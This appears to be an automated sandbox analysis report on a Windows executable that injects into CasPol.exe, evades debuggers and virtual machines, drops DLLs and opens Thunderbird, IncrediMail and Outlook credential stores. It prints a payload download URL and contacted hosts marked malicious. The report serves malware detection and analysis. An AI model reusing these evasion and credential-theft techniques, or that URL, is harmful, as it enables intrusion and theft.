Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_716630C0 push eax; ret	2_2_716630EE
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_04695064 push eax; retf	2_2_046950BC
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_04691E42 push ecx; iretd	2_2_04691E4B
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_04690A38 push edx; ret	2_2_04690A4B
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_04693D37 push esi; iretd	2_2_04693D7E
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_04694FEA push eax; retf	2_2_046950BC
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_04691EF0 push edi; retf	2_2_04691EFB
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_04690AA3 push ds; retf	2_2_04690AA4
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_046906A2 push edi; ret	2_2_046906A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00D0F54B push ds; iretd	5_2_00D0F557
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01162177 push edi; retn 0000h	5_2_01162179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_011663FC push E8009BBFh; ret	5_2_01166401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01220312 push 8BFFFFFFh; retf	5_2_01220318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20032D3B push edx; retf	5_2_20032D3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20032E10 push ecx; retf	5_2_20032E12

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	File created: C:\Users\user\AppData\Local\Temp\secur32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	File created: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll	Jump to dropped file

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLB
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://WWW.KONUTMARKET.COM/2022FILE_IZNUHDOSU25.BIN

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	API call chain: ExitProcess graph end node

Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5
Source: CasPol.exe, 00000005.00000002.255487878510.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlb
Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://www.konutmarket.com/2022file_izNuHdosu25.bin
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 00000005.00000002.255513838667.000000001DEE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.18.206.58	konutmarket.com	Turkey		50941	VARGONENTR	true
46.16.58.183	mail.restaurantsllado.com	Spain		197712	CDMONsistemescdmoncomES	true

ID:	562499
Product:	CloudBasic
Start time:	23:06:52
Start date:	28.01.2022
Sample:	9TpV4rfMmJ.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	38034f18af511c3b04b25170735e8b8e
SHA1:	797252e9139d3d46825440335437ad9d538f6b5b
SHA256:	7babdd2c7d3752b7b48729110f0ab94de7cf74c478b7e1ea7a71a468748e70c0
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CFF85C549D536F651D4FB8387F1976F2	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
C:\Users\user\AppData\Local\Temp\racehorse.dat	data	D65C77AD010482FBF9F7983146D0A6B5	8400E92DA91E588A3CF2C9C419CB4BAB2CA60B7C	F4BAA8F8FC7D5DF13DC487345B430C8733C59C0D37DD5E5462FBBD33945E724D
C:\Users\user\AppData\Local\Temp\secur32.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E1FA0E4751888A35553A93778A348A24	98667AE0AB2D955E69C365D62F2DD1A8C839E14E	A074AA8C960FF9F9F609604DB0B6FEFDD454CEB746DE6749753A551FE7B99B51
C:\Users\user\AppData\Local\Temp\sxsstore.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	3F305E85F2751C4AA1A4EFDF3240EDA6	FBD849B83E98E5D0F2A2B2F8E3649ADA7078B2E9	95444BF7752F9092FE00CA6F96FD170820026ED990B1EA59CE34524978B4EB12
\Device\ConDrv	ASCII text, with CRLF line terminators	9F754B47B351EF0FC32527B541420595	006C66220B33E98C725B73495FE97B3291CE14D9	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591

Windows Analysis Report 9TpV4rfMmJ.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
9TpV4rfMmJ.exe